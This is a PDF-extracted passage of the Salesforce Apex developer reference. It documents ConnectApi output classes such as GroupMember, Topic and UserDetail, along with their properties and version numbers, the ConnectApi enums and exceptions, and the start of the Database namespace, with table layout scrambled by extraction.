Subclass of ConnectApi.FeedElement Class
ConnectApi.GlobalInfluence Class
Name
Type
Description
Available Version
percentile
String
Percentile value for the users influence rank within the organization 28.0
or community
1047
Reference
Name
Type
Description
Available Version
rank
Integer
28.0
ConnectApi.GroupChatterSettings Class
A users Chatter settings for a specific group.
Name
Type
Description
emailFrequency ConnectApi.
GroupEmail
Frequency Enum
Available Version
ConnectApi.GroupInformation Class
Describes the Information section of the group. In the Web UI, this section is above the Description section. If the group is private,
this section is visible only to members.
Name
Type
Description
Available Version
text
String
28.0
title
String
28.0
ConnectApi.GroupMember Class
Name
Type
Description
Available Version
id
String
Users 18-character ID
28.0
lastFeed
AccessDate
Datetime
31.0
role
ConnectApi.
GroupMembership
Type Enum
url
String
28.0
user
ConnectApi.User
Summary
28.0
1048
Reference
ConnectApi.GroupMemberPage Class
Name
Type
currentPageUrl String
Description
Available
Version
28.0
members
28.0
myMembership
ConnectApi.
Reference
28.0
nextPageUrl
String
28.0
previousPageUrl String
Chatter REST API URL identifying the previous page or null 28.0
if there isnt a previous page.
totalMemberCount Integer
28.0
ConnectApi.GroupMembershipRequest Class
Name
Type
Description
Available
Version
createdDate
Datetime
id
String
28.0
lastUpdateDate Datetime
requestedGroup ConnectApi.
Reference
responseMessage String
28.0
ConnectApi.
GroupMembership
RequestStatus
Enum
28.0
Accepted
Declined
Pending
url
String
28.0
user
ConnectApi.User
Summary
28.0
1049
Reference
ConnectApi.GroupMembershipRequests Class
Name
Type
Description
requests
28.0
total
Integer
28.0
Available Version
ConnectApi.HashtagSegment Class
Subclass of ConnectApi.MessageSegment Class
Name
Type
Description
Available Version
tag
String
28.0
topicUrl
String
Chatter REST API Topics resource that searches for the topic:
28.0
/services/data/v32.0/chatter
/topics?exactMatch=true&q=topic
url
String
Chatter REST API Feed Items resource URL that searches for the topic
in all feed items in an organization:
28.0
/services/data/v32.0/chatter/feed-items?q=topic
ConnectApi.Icon Class
Property
Type
Description
Available
Version
height
Integer
28.0
width
Integer
28.0
url
String
The URL of the icon. This URL is available to unauthenticated users. This 28.0
URL does not expire.
ConnectApi.LabeledRecordField Class
This class is abstract.
Subclass of ConnectApi.AbstractRecordField Class
Superclass of:
ConnectApi.CompoundRecordField Class
ConnectApi.CurrencyRecordField Class
ConnectApi.DateRecordField Class
1050
Reference
ConnectApi.PercentRecordField Class
ConnectApi.PicklistRecordField Class
ConnectApi.RecordField Class
ConnectApi.ReferenceRecordField Class
ConnectApi.ReferenceWithDateRecordField Class
A record field containing a label and a text value.
Important: The composition of a feed may change between releases. Your code should always be prepared to handle instances
of unknown subclasses.
Name
Type
Description
Available Version
label
String
29.0
text
String
The text value of the record field. All record fields have a text value. 29.0
To ensure that all clients can consume new content, inspect the
record fields type property and if it isnt recognized, render the
text value as the default case.
ConnectApi.LinkAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.LinkCapability is used.
Subclass of ConnectApi.FeedItemAttachment Class
Name
Type
Description
Available Version
title
String
28.031.0
url
String
28.031.0
ConnectApi.LinkCapability
If a feed element has this capability, it has a link.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
url
String
32.0
urlName
String
32.0
ConnectApi.LinkSegment Class
Subclass of ConnectApi.MessageSegment Class
Name
Type
Description
Available Version
url
String
28.0
1051
Reference
ConnectApi.ManagedTopic Class
Represents a managed topic in a community.
Property Name
Type
Description
Available Version
id
String
ID of managed topic.
32.0
32.0
32.0
url
String
32.0
ConnectApi.ManagedTopicCollection Class
A collection of managed topics.
Property Name
Type
Description
Available Version
currentPageUrl
String
32.0
managedTopics
32.0
ConnectApi.MentionCompletion Class
Information about a record that could be used to @mention a user or group.
Name
Type
additionalLabel String
Description
Available Version
An additional label (if one exists) for the record represented by this 29.0
completion, for example, (Customer) or (Acme Corporation).
description
String
name
String
The name of the record represented by this completion. The name 29.0
is localized, if possible.
photoUrl
String
29.0
recordId
String
29.0
1052
29.0
Reference
Name
Type
userType
ConnectApi. If the record represented by this completion is a user, this value is 30.0
the user type associated with that user; otherwise the value is null.
UserType
Enum
Description
Available Version
ConnectApi.MentionCompletionPage Class
A paginated list of Mention Completion response bodies.
Name
Description
Available
Version
currentPageUrl String
29.0
mentionCompletions List<ConnectApi.
MentionCompletion>
nextPageUrl
Type
String
previousPageUrl String
29.0
29.0
ConnectApi.MentionSegment Class
Subclass of ConnectApi.MessageSegment Class
Name
Type
Description
Available
Version
accessible
Boolean
28.0
name
String
28.0
record
ConnectApi.
ActorWithId
29.0
1053
Reference
Name
Type
Description
Available
Version
user
ConnectApi.User
Summary
28.0 only
In versions before
29.0, if the mention
is not a user, the
mention is in a
ConnectApi.TextSegment
object.
ConnectApi.MentionValidation Class
Information about whether a proposed mention is valid for the context user.
Name
Type
Description
Available Version
recordId
String
29.0
29.0
validationStatus ConnectApi.
MentionValidation
Status Enum
ConnectApi.MentionValidations Class
Information about whether a set of mentions is valid for the context user.
Name
Type
Description
hasErrors
Boolean
1054
Available Version
Reference
Name
Type
Description
Available Version
29.0
ConnectApi.MessageBody Class
Subclass of ConnectApi.AbstractMessageBody Class
No additional properties.
ConnectApi.MessageSegment Class
This class is abstract.
Superclass of:
ConnectApi.ComplexSegment Class
ConnectApi.EntityLinkSegment Class
ConnectApi.FieldChangeSegment Class
ConnectApi.FieldChangeNameSegment Class
ConnectApi.FieldChangeValueSegment Class
ConnectApi.HashtagSegment Class
ConnectApi.LinkSegment Class
ConnectApi.MentionSegment Class
ConnectApi.MoreChangesSegment Class
ConnectApi.ResourceLinkSegment Class
ConnectApi.TextSegment Class
Message segments in a feed item are typed as ConnectApi.MessageSegment. Feed item capabilities are typed as
ConnectApi.FeedItemCapability. Record fields are typed as ConnectApi.AbstractRecordField. These classes
are all abstract and have several concrete subclasses. At runtime you can use instanceof to check the concrete types of these objects
and then safely proceed with the corresponding downcast. When you downcast, you must have a default case that handles unknown
subclasses.
Important: The composition of a feed may change between releases. Your code should always be prepared to handle instances
of unknown subclasses.
Name
Type
Description
Available Version
text
String
28.0
type
ConnectApi.
Textual summary of the message segment. The values
MessageSegment correspond to the different child classes. Value are:
Type Enum
ConnectApi.EntityLinkSegment
28.0
ConnectApi.FieldChangeSegment
1055
Reference
Name
Type
Description
Available Version
ConnectApi.FieldChangeNameSegment
ConnectApi.FieldChangeValueSegment
ConnectApi.HashtagSegment
ConnectApi.LinkSegment
ConnectApi.MentionSegment
ConnectApi.MoreChangesSegment
ConnectApi.ResourceLinkSegment
ConnectApi.TextSegment
ConnectApi.ModerationCapability Class
If a feed element has this capability, users in a community can flag it for moderation.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
moderationFlags
ConnectApi.
ModerationFlags
ConnectApi.ModerationFlags Class
Information about the moderation flags on a feed item, comment, or file.
Name
Type
Description
Available Version
flagCount
Integer
flaggedByMe
Boolean
true if the context user had flagged the feed item, comment, or 29.0
file for moderation; false otherwise.
ConnectApi.MoreChangesSegment Class
Subclass of ConnectApi.MessageSegment Class
In feed items with a large number of tracked changes, the message is formatted as: changed A, B, and made X more changes. The
MoreChangesSegment contains the X more changes.
Name
Type
Description
Available Version
moreChanges
1056
29.0
Reference
Name
Type
moreChangesCount Integer
Description
Available Version
28.0
ConnectApi.Motif Class
The motif properties contain URLs for small, medium, and large icons that indicate the Salesforce record type. Common record types
are files, users, and groups, but all record types have a set of motif icons. Custom object records use their tab style icon. All icons are
available to unauthenticated users so that, for example, you can display the motif icons in an email. The motif can also contain the record
types base color.
Note: The motif images are icons, not user uploaded images or photos. For example, every user has the same set of motif icons.
Custom object records use their tab style icon, for example, the following custom object uses the boat tab style:
"motif": {
"color: "8C004C",
"largeIconUrl": "/img/icon/custom51_100/boat64.png",
"mediumIconUrl": "/img/icon/custom51_100/boat32.png",
"smallIconUrl": "/img/icon/custom51_100/boat16.png"
},
Note: To view the icons in the previous examples, preface the URL with https://instance_name. For example,
https://instance_name/img/icon/profile64.png.
1057
Reference
Name
Type
Description
Available
Version
color
String
A hex value representing the base color of the record type, or null. 29.0
largeIconUrl
String
28.0
mediumIconUrl
String
28.0
smallIconUrl
String
28.0
ConnectApi.NonEntityRecommendation Class
Represents a recommendation for a non-Salesforce entity, such as an application.
Subclass of ConnectApi.AbstractRecommendation Class.
Property Name
Type
Description
Available Version
displayLabel
String
32.0
motif
32.0
ConnectApi.OrganizationSettings Class
Name
Type
Description
Available
Version
accessTimeout
Integer
features
name
String
Organization name
28.0
orgId
String
28.0
userSettings
user
ConnectApi.PercentRecordField Class
Subclass of ConnectApi.LabeledRecordField Class
A record field containing a percentage value.
Name
Type
Description
Available Version
value
Double
29.0
1058
Reference
ConnectApi.PhoneNumber Class
A phone number.
Name
Type
Description
Available Version
label
String
30.0
phoneNumber
String
Phone number
28.0
phoneType
String
30.0
Fax
Mobile
Work
These values are not localized.
type
String
28.029.0
Values are:
Fax
Mobile
Work
These values are not localized.
ConnectApi.Photo Class
Name
Type
Description
Available Version
fullEmailPhotoUrl String
A temporary URL to the large profile picture. The URL expires after 28.0
30 days and is available to unauthenticated users.
String
URL to the large profile picture. The default width is 200 pixels, and 28.0
the height is scaled so the original image proportions are
maintained.
largePhotoUrl
photoVersionId String
28.0
28.0
smallPhotoUrl
String
URL to the small profile picture. The default size is 64x64 pixels.
standardEmail
PhotoUrl
String
A temporary URL to the small profile. The URL expires after 30 days 28.0
and is available to unauthenticated users.
url
String
ConnectApi.PicklistRecordField Class
Subclass of ConnectApi.LabeledRecordField Class
1059
28.0
Reference
ConnectApi.PollCapability Class
If a feed element has this capability, it includes a poll.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
choices
List<ConnectApi.
FeedPollChoice>
32.0
myChoiceId
String
32.0
totalVoteCount
Integer
ConnectApi.QuestionAndAnswersCapability Class
If a feed element has this capability, it has a question and comments on the feed element are answers to the question.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
bestAnswer
ConnectApi.
Comment
32.0
bestAnswer
SelectedBy
ConnectApi.
UserSummary
32.0
canCurrentUser
SelectOrRemove
BestAnswer
Boolean
questionTitle
String
32.0
ConnectApi.QuestionAndAnswersSuggestions Class
Question and answers suggestions.
Property Name
Type
Description
articles
32.0
questions
32.0
1060
Available Version
Reference
ConnectApi.RecommendationsCapability
If a feed element has this capability, it has a recommendation.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
items
List<ConnectApi.
A list of recommendations.
32.0
Abstract
Recommendation>
ConnectApi.RecommendationExplanation Class
Explanation for a recommendation.
Subclass of ConnectApi.AbstractRecommendationExplanation Class.
Property Name
Type
Description
Available Version
detailsUrl
String
ConnectApi.RecordField Class
Subclass of ConnectApi.LabeledRecordField Class
A generic record field containing a label and text value.
ConnectApi.RecordSnapshotAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.RecordSnapshotCapability is
used.
Subclass of ConnectApi.FeedItemAttachment Class
The fields of a record at the point in time when the record was created.
Name
Type
Description
Available
Version
recordView
29.031.0
ConnectApi.RecordSnapshotCapability
If a feed element has this capability, it contains all the snapshotted fields of a record for a single create record event.
Subclass of ConnectApi.FeedElementCapability Class.
1061
Reference
Property Name
Type
Description
Available Version
recordView
ConnectApi.
RecordView
ConnectApi.RecordSummary Class
Subclass of ConnectApi.AbstractRecordView Class
No additional properties.
ConnectApi.RecordSummaryList Class
Summary information about a list of records in the organization including custom objects.
Name
Type
Description
Available
Version
records
List<ConnectApi.ActorWithId>
A list of records.
30.0
url
String
30.0
ConnectApi.RecordView Class
Subclass of ConnectApi.AbstractRecordView Class
A view of any record in the organization, including a custom object record. This object is used if a specialized object, such as User or
ChatterGroup, is not available for the record type. Contains data and metadata so you can render a record with one response.
Name
Type
Description
Available
Version
sections
List<ConnectApi.
RecordViewSection>
29.0
ConnectApi.RecordViewSection Class
A section of record fields and values on a record detail.
Name
Type
Description
columnCount
Integer
The number of columns to use to lay out the fields in a record 29.0
section.
columnOrder
ConnectApi.
RecordColumnOrder
The order of the fields to use in the fields property to lay 29.0
out the fields in a record section.
Enum
1062
Available
Version
Reference
Name
Type
Description
Available
Version
fields
ConnectApi.
Abstract
RecordField
The fields and values for the record contained in this section. 29.0
heading
String
isCollapsible
Boolean
Indicates whether the section can be collapsed to hide all the 29.0
fields (true) or not (false).
29.0
ConnectApi.Reference Class
Name
Type
Description
Available Version
id
String
28.0
url
String
28.0
ConnectApi.ReferenceRecordField Class
Subclass of ConnectApi.LabeledRecordField Class
A record field with a label and text value.
Name
Type
Description
Available Version
reference
29.0
ConnectApi.ReferenceWithDateRecordField Class
Subclass of ConnectApi.LabeledRecordField Class
A record field containing a referenced object that acted at a specific time, for example, Created By....
Name
Type
Description
Available Version
dateValue
Datetime
29.0
reference
ConnectApi.Reputation Class
Reputation for a user.
1063
29.0
Reference
Property Name
Type
Description
Available Version
reputationLevel
ConnectApi.
ReputationLevel
32.0
32.0
32.0
reputationPoints Double
String
url
ConnectApi.ReputationLevel Class
Reputation level for a user.
Property Name
Type
Description
Available Version
levelImageUrl
String
32.0
levelName
String
32.0
levelNumber
Integer
ConnectApi.ResourceLinkSegment Class
Name
Type
Description
Available Version
url
String
ConnectApi.Subscription Class
Name
Type
Description
community
ConnectApi.Reference
id
String
Subscriptions 18character ID
28.0
subject
ConnectApi.Actor
28.0
subscriber
ConnectApi.Actor
28.0
url
String
1064
Available Version
Reference
ConnectApi.TextSegment Class
Subclass of ConnectApi.MessageSegment Class
No additional properties.
ConnectApi.TimeZone Class
The user's time zone as selected in My Settings in Salesforce. This value does not reflect a device's current location.
Name
Type
Description
Available Version
gmtOffset
Double
30.0
name
String
30.0
ConnectApi.Topic Class
Name
Type
Description
Available Version
createdDate
Datetime
29.0
description
String
29.0
id
String
18-character ID
29.0
images
32.0
name
String
29.0
talkingAbout
Integer
Number of people talking about this topic over the last two months, 29.0
based on factors such as topic additions and comments on posts
with the topic
url
String
29.0
ConnectApi.TopicEndorsement Class
Represents one user endorsing another user for a single topic.
Name
Type
Description
Available
Version
endorsee
ConnectApi.User
Summary
30.0
endorsementId
String
30.0
endorser
ConnectApi.User
Summary
30.0
topic
ConnectApi.Topic
30.0
1065
Reference
Name
Type
Description
Available
Version
url
String
30.0
ConnectApi.TopicEndorsementCollection Class
A collection of topic endorsement response bodies.
Name
Type
currentPageUrl String
Description
Available Version
30.0
String
Chatter REST API URL identifying the next page or null if there 30.0
isnt a next page.
previousPageUrl String
Chatter REST API URL identifying the previous page or null if 30.0
there isnt a previous page.
nextPageUrl
30.0
ConnectApi.TopicImages Class
Images associated with a topic.
Property Name
Type
Description
Available Version
coverImageUrl
String
featuredImageUrl String
ConnectApi.TopicPage Class
Name
Type
currentPageUrl String
Description
Available
Version
29.0
nextPageUrl
String
Chatter REST API URL identifying the next page or null 29.0
if there isnt a next page.
topics
List<ConnectApi.
Topic>
List of topics
1066
29.0
Reference
ConnectApi.TopicsCapability Class
If a feed element has this capability, the context user can add topics to it. Topics help users organize and discover conversations.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
canAssignTopics
Boolean
items
List<ConnectApi.
Topic>
32.0
ConnectApi.TopicSuggestion Class
Name
Type
Description
Available
Version
existingTopic
ConnectApi.Topic
29.0
name
String
Topic name
29.0
ConnectApi.TopicSuggestionPage Class
Name
Type
TopicSuggestionPage List<ConnectApi.
TopicSuggestion>
Description
Available
Version
29.0
ConnectApi.TrackedChangeAttachment Class
Important: This class isnt available in version 32.0 and later. In version 32.0 and later, ConnectApi.TrackedChangesCapability is
used.
Name
Type
Description
Available
Version
changes
List<ConnectApi.
TrackedChangeItem>
28.031.0
ConnectApi.TrackedChangeBundleCapability
If a feed element has this capability, it has a group of other feed elements aggregated into one feed element called a bundle. This type
of bundle aggregates feed tracked changes.
Subclass of ConnectApi.BundleCapability Class.
1067
Reference
Property Name
Type
Description
Available Version
changes
List<ConnectApi.
31.0
TrackedChangeItem>
ConnectApi.TrackedChangeItem Class
Name
Type
Description
Available
Version
fieldName
String
28.0
newValue
String
The new value of the field or null if the field length is long.
28.0
oldValue
String
The old value of the field or null if the field length is long.
28.0
ConnectApi.TrackedChangesCapability
If a feed element has this capability, it contains all changes to a record for a single tracked change event.
Subclass of ConnectApi.FeedElementCapability Class.
Property Name
Type
Description
Available Version
changes
List<ConnectApi.
32.0
TrackedChangeItem>
ConnectApi.UnauthenticatedUser Class
Subclass of ConnectApi.Actor Class
No additional properties.
Instances of this class are used as the actor for feed items and comments posted by Chatter customers.
ConnectApi.UnreadConversationCount Class
Name
Type
Description
Available
Version
hasMore
Boolean
29.0
unreadCount
Integer
29.0
ConnectApi.User Class
This class is abstract.
Subclass of ConnectApi.ActorWithId Class
1068
Reference
Superclass of:
ConnectApi.UserDetail Class
ConnectApi.UserSummary Class
Name
Type
Description
Available Version
additional
Label
String
30.0
32.0
28.0
communityNickname String
companyName
String
String
firstName
String
28.0
isChatterGuest Boolean
isInThisCommunity Boolean
lastName
String
28.0
photo
ConnectApi.Photo
28.0
reputation
32.0
title
String
28.0
Users title
If your community allows access without logging in,
the value is null for guest users.
userType
ConnectApi.UserType
Enum
1069
28.0
Reference
Name
Type
Description
Available Version
ConnectApi.UserCapabilities Class
The capabilities associated with a user profile.
Name
Type
Description
Available
Version
canChat
Boolean
Specifies if the context user can use Chatter Messenger with the
subject user (true) or not (false)
29.0
canDirectMessage Boolean
Specifies if the context user can direct message the subject user
(true) or not (false)
29.0
29.0
canEdit
Boolean
Specifies if the context user can edit the subject users account
(true) or not (false)
canFollow
Boolean
Specifies if the context user can follow the subject users feed (true) 29.0
or not (false)
canViewFeed
Boolean
Specifies if the context user can view the feed of the subject user
(true) or not (false)
29.0
Specifies if the context user can view the full profile of the subject
user (true) or only the limited profile (false)
29.0
canViewFullProfile Boolean
isModerator
Boolean
ConnectApi.UserChatterSettings Class
A users global Chatter settings.
Name
Type
Description
Available
Version
defaultGroup
ConnectApi.GroupEmail The default frequency with which a user receives email 28.0
from a group when they join it.
EmailFrequency Frequency Enum
ConnectApi.UserDetail Class
Subclass of ConnectApi.User Class
Details about a user in an organization.
If the context user doesnt have permission to see a property, its value is set to null.
1070
Reference
Name
Type
Description
Available
Version
aboutMe
String
28.0
address
ConnectApi.Address
Users address
28.0
chatterActivity ConnectApi.Chatter
Activity
28.0
chatterInfluence ConnectApi.Global
Influence
28.0
28.0
28.0
String
followersCount Integer
28.0
groupCount
Integer
28.0
hasChatter
Boolean
31.0
isActive
Boolean
28.0
managerId
String
28.0
managerName
String
28.0
phoneNumbers
thanksReceived Integer
username
String
28.0
29.0
28.0
ConnectApi.UserGroupPage Class
A paginated list of groups the context user is a member of.
Name
Type
Description
Available
Version
currentPageUrl String
28.0
groups
List<ConnectApi.
ChatterGroup
Summary>
List of groups
28.0
nextPageUrl
String
Chatter REST API URL identifying the next page or null if 28.0
there isnt a next page.
1071
Reference
Name
Type
previousPageUrl String
total
Integer
Description
Available
Version
Chatter REST API URL identifying the previous page or null 28.0
if there isnt a previous page.
Total number of groups across all pages
28.0
ConnectApi.UserPage Class
Name
Type
Description
Available
Version
currentPageToken Integer
28.0
currentPageUrl String
28.0
nextPageToken
Integer
Token identifying the next page or null if there isnt a next 28.0
page.
nextPageUrl
String
28.0
previousPageToken Integer
previousPageUrl String
Chatter REST API URL identifying the previous page or null 28.0
if there isnt a previous page.
users
List<ConnectApi.User List of user detail information. If the context user doesnt have 28.0
permission to see a property, the property is set to null.
Detail>
ConnectApi.UserProfile Class
Details necessary to render a view of a user profile.
Name
Type
Description
Available
Version
capabilities
ConnectApi.UserCapabilities
29.0
id
String
29.0
tabs
List<ConnectApi.UserProfileTab> The tabs visible to the context user specific to the 29.0
String
userDetail
ConnectApi.UserDetail
1072
29.0
Reference
ConnectApi.UserProfileTab Class
Information about a profile tab.
Name
Type
Descriptio
Available
Version
id
String
29.0
isDefault
Boolean
tabType
ConnectApi.UserProfile
TabType Enum
29.0
tabUrl
String
29.0
ConnectApi.UserSettings Class
Property
Type
Description
Available
Version
approvalPosts
Boolean
28.0
canFollow
Boolean
28.0
canModify
AllData
Boolean
28.0
canOwnGroups
Boolean
28.0
canViewAllData Boolean
28.0
canViewAllGroups Boolean
28.0
canViewAllUsers Boolean
28.0
28.0
28.0
canViewFull
UserProfile
Boolean
canViewPublicFiles Boolean
1073
Reference
Property
Type
currencySymbol String
Description
Available
Version
Currency symbol to use for displaying currency values. Applicable only when 28.0
the ConnectApi.Features.multiCurrency property is false.
externalUser
Boolean
28.0
fileSyncLimit
Integer
32.0
fileSync
StorageLimit
Integer
29.0
folderSync
Limit
Integer
32.0
hasAccessTo
InternalOrg
Boolean
28.0
hasChatter
Boolean
31.0
hasFileSync
Boolean
28.0
hasRestData
ApiAccess
Boolean
29.0
timeZone
ConnectApi. The user's time zone as selected in My Settings in Salesforce. This value does 30.0
not reflect a device's current location.
TimeZone
userDefault
String
CurrencyIsoCode
The ISO code for the default currency. Applicable only when the
ConnectApi.Features.multiCurrency property is true.
28.0
userId
String
28.0
userLocale
String
Locale of user
28.0
ConnectApi.UserSummary Class
Subclass of ConnectApi.User Class
Name
Type
Description
Available
Version
isActive
Boolean
28.0
ConnectApi.Zone Class
Information about a Chatter Answers zone.
Name
Type
Description
Available
Version
description
String
29.0
1074
Reference
Name
Type
Description
Available
Version
id
String
The zone ID
29.0
isActive
Boolean
29.0
isChatterAnswers Boolean
name
String
29.0
url
String
30.0
visibility
ConnectApi.ZoneShowIn
29.0
CommunityAvailable in a community.
InternalAvailable internally only.
PortalAvailable in a portal.
visibilityId
String
ConnectApi.ZonePage Class
Information about zone pages.
Name
Type
Description
Available
Version
zones
List<ConnectApi.Zone>
29.0
currentPageUrl String
29.0
Description
Available
Version
currentPageToken String
29.0
currentPageUrl String
nextPageUrl
String
ConnectApi.ZoneSearchPage Class
Information about the search results for zones.
Name
items
Type
1075
29.0
Reference
ConnectApi Enums
Name
Type
Description
Available
Version
nextPageToken
String
nextPageUrl
String
29.0
ConnectApi.ZoneSearchResult Class
Information about a specific zone search result.
Name
Type
Description
Available
Version
hasBestAnswer
Boolean
29.0
id
String
title
String
29.0
type
ConnectApi.ZoneSearch
ResultType Enum
29.0
voteCount
String
29.0
ConnectApi Enums
Enums specific to the ConnectApi namespace.
ConnectApi enums inherit all properties and methods of Apex enums.
Enum
Description
ConnectApi.BannerStyle
ConnectApi.BundleType
1076
Reference
Enum
ConnectApi Enums
Description
TrackedChangesA bundle that represents a collection of feed tracked changes.
The bundle includes summary information about the feed tracked changes that make up
the bundle.
ConnectApi.CommentType
ConnectApi.CommunityFlag Specifies the visibility behavior of a flag for various user types.
Visibility
ModeratorsOnlyThe flag is visible only to users with moderation permissions on
ConnectApi.
DatacloudUserType
1077
Reference
Enum
ConnectApi Enums
Description
Listpool A user type that allows users to draw from a pool of points to purchase
Data.com records.
ConnectApi.EmailMessage
Direction
ConnectApi.FeedDensity
ConnectApi.
Specifies the capabilities of a feed element in API versions 31.0 and later. If a capability exists
FeedElementCapabilityType on a feed element, the capability is available, even if the value doesnt exist or is null. If the
1078
Reference
Enum
ConnectApi Enums
Description
TopicsThe context user can add topics to the feed element.
TrackedChangesThe feed element has all changes to a record for a single tracked
change event.
ConnectApi.FeedElement
Type
Feed elements are the top-level objects that a feed contains. The feed element type describes
the characteristics of that feed element.
BundleA container of feed elements. A bundle also has a body made up of message
segments that can always be gracefully degraded to text-only values.
FeedItemA feed item has a single parent and is scoped to one community or across
all communities. A feed item can have capabilities such as boomarks, canvas, content,
comment, link, poll, and so on. Feed items have a body made up of message segments
that can always be gracefully degraded to text-only values.
RecommendationA recommendation is a feed element with a recommendations
capability. A recommedation suggests records to follow, groups to join, or applications
that may be helpful to the context user.
ConnectApi.FeedFavorite
Type
Specifies the origin of the feed favorite, such as whether its a search term or a list view:
ListView
Search
Topic
ConnectApi.FeedFilter
ConnectApi.FeedItem
AttachmentType
1079
Reference
Enum
ConnectApi Enums
Description
RecordSnapshotThe feed item attachment contains a view of a record at a single
ConnectApi.FeedItemType.CreateRecordEvent.
TrackedChangeAll changes to a record for a single
ConnectApi.FeedItemType.TrackedChange event.
ConnectApi.FeedItemType
Specifies the type of feed item, such as a content post, a text post, and so on.
ActivityEventFeed item generated in Case Feed when an event or task associated
with a parent record with a feed enabled is created or updated.
AdvancedTextPostA feed item with advanced text formatting, such as a group
announcement post.
ApprovalPostFeed item with an approval capability. Approvers can act on the
feed item parent.
AttachArticleEventFeed item generated when an article is attached to a case
in Case Feed.
BasicTemplateFeedItemFeed item with an enhanced link capability.
CallLogPostFeed item generated when a call log is saved to a case in Case Feed.
CanvasPostFeed item generated by a canvas app in the publisher or from Chatter
REST API or Chatter in Apex. The post itself is a link to a canvas app.
CaseCommentPostFeed item generated when a case comment is saved in Case
Feed.
ChangeStatusPostFeed item generated when the status of a case is changed in
Case Feed.
ChatTranscriptionPostFeed item generated in Case Feed when a Live Agent
chat transcript is saved to a case.
CollaborationGroupCreatedFeed item generated when a new public group
is created. Contains a link to the new group.
CollaborationGroupUnarchivedDeprecated. Feed item generated when
an archived group is activated.
ContentPostFeed item with a content capability.
CreateRecordEventFeed item that describes a record created in the publisher.
DashboardComponentAlertFeed item with a dashboard alert.
DashboardComponentSnapshotFeed item with a dashboard component
snapshot capability.
EmailMessageEventFeed item generated when an email is sent from a case in
Case Feed.
FacebookPostDeprecated. Feed item generated when a Facebook post is created
from a case in Case Feed.
LinkPostFeed item with a link capability.
MilestoneEventFeed item generated when a case milestone is either completed
or reaches a violation status. Contains a link to the case milestone.
PollPostFeed item with a poll capability. Viewers of the feed item are allowed to
vote on the options in the poll.
1080
Reference
Enum
ConnectApi Enums
Description
ProfileSkillPostFeed item generated when a skill is added to a users profile.
QuestionPostFeed item generated when a question is asked.
ReplyPostFeed item generated by a Chatter Answers reply.
RypplePostFeed item generated when a user posts thanks.
SocialPostFeed item generated when a social post is created from a case in Case
Feed.
TextPostFeed item containing text only.
TrackedChangeFeed item created when one or more fields on a record have been
changed.
UserStatusDeprecated. A user's post to their own profile.
ConnectApi.FeedItem
VisibilityType
ConnectApi.FeedSortOrder Specifies the order returned by the sort, such as by date created or last modified:
1081
Reference
Enum
ConnectApi Enums
Description
ToContains all feed items with mentions of the context user, feed items the context
user commented on, and feed items created by the context user that are commented on.
TopicsContains all feed items that include the specified topic.
UserProfileContains feed items created when a user changes records that can
be tracked in a feed, feed items whose parent is the user, and feed items that @mention
the user. This feed is different than the news feed, which returns more feed items, including
group updates.
ConnectApi.FieldChange
ValueType
ConnectApi.
FilePublishStatus
ConnectApi.
FileSharingType
ConnectApi.GroupArchive
Status
Specifies a set of groups based on whether the groups are archived or not.
AllAll groups, including groups that are archived and groups that are not archived.
ArchivedOnly groups that are archived.
NotArchivedOnly groups that are not archived.
ConnectApi.GroupEmail
Frequency
Specifies the frequency with which a user receives email from a group.
EachPost
DailyDigest
WeeklyDigest
Never
UseDefault
ConnectApi.
GroupMembershipType
Specifies the type of membership the user has with the group, such as group owner, manager,
or member.
GroupOwner
GroupManager
1082
Reference
Enum
ConnectApi Enums
Description
NotAMember
NotAMemberPrivateRequested
StandardMember
ConnectApi.
GroupMembership
RequestStatus
ConnectApi.
GroupVisibilityType
ConnectApi.ManagedTopic
Type
ConnectApi.
MentionCompletionType
ConnectApi.
MentionValidationStatus
ConnectApi.MessageSegment Specifies the type of message segment, such as text, link, field change name, or field change
value.
Type
EntityLink
FieldChange
FieldChangeName
FieldChangeValue
Hashtag
Link
1083
Reference
Enum
ConnectApi Enums
Description
Mention
MoreChanges
ResourceLink
Text
ConnectApi.
Specifies the action to take on a recommendation.
RecommendationActionType followFollow a record or user.
joinJoin a group.
viewView a record or file.
ConnectApi.
Indicates the reason for a recommendation.
RecommendationExplanationType FilePopularFiles with many followers or views
FileViewedTogetherFiles often viewed at the same time as other files the context
user views
FollowedTogetherWithFolloweesUsers often followed with the same people
the context user follows
GroupMembersFollowedGroups with members the context user follows
GroupNewRecently created groups
GroupPopularGroups with many active members
ItemViewedTogetherRecords often viewed at the same time as other records
the context user views
PopularAppApplications that are popular
RecordOwnedRecords owned by the context user
RecordParentOfFollowedParent records of records the context user follows
RecordViewedRecords the context user recently viewed
UserDirectReportUsers who report to the context user
UserFollowedTogetherUsers often followed at the same time as other users
the context user follows
UserFollowsSameUsersUsers who follow the same users as the context user
UserManagerThe context users manager
UserNewRecently created users
UserPeerUsers who report to the same manager as the context user
UserPopularUsers with many followers
UserViewingSameRecordsUsers who view the same records as the context
user
ConnectApi.
RecommendationType
1084
Reference
Enum
ConnectApi Enums
Description
records
users
ConnectApi.
RecordColumnOrder
ConnectApi.
RecordFieldType
ConnectApi.SortOrder
ConnectApi.TopicSort
ConnectApi.UserProfile
TabType
1085
Reference
Enum
ConnectApi Exceptions
Description
ElementTab that displays generic content inline.
FeedTab that displays the Chatter feed.
OverviewTab that displays user details.
ConnectApi.UserType
ConnectApi.
WorkflowProcessStatus
ConnectApi.ZoneSearch
ResultType
ConnectApi.ZoneShowIn
ConnectApi Exceptions
The ConnectApi namespace contains exception classes.
All exceptions classes support built-in methods for returning the error message and exception type. See Exception Class and Built-In
Exceptions on page 1469.
The ConnectApi namespace contains these exceptions:
1086
Reference
Database Namespace
Exception
Description
ConnectApi.ConnectApiException
ConnectApi.NotFoundException
ConnectApi.RateLimitException
Database Namespace
The Database namespace provides classes used with DML operations.
The following are the classes in the Database namespace.
IN THIS SECTION:
Batchable Interface
The class that implements this interface can be executed as a batch Apex job.
BatchableContext Interface
Represents the parameter type of a batch job method and contains the batch job ID. This interface is implemented internally by
Apex.
DeletedRecord Class
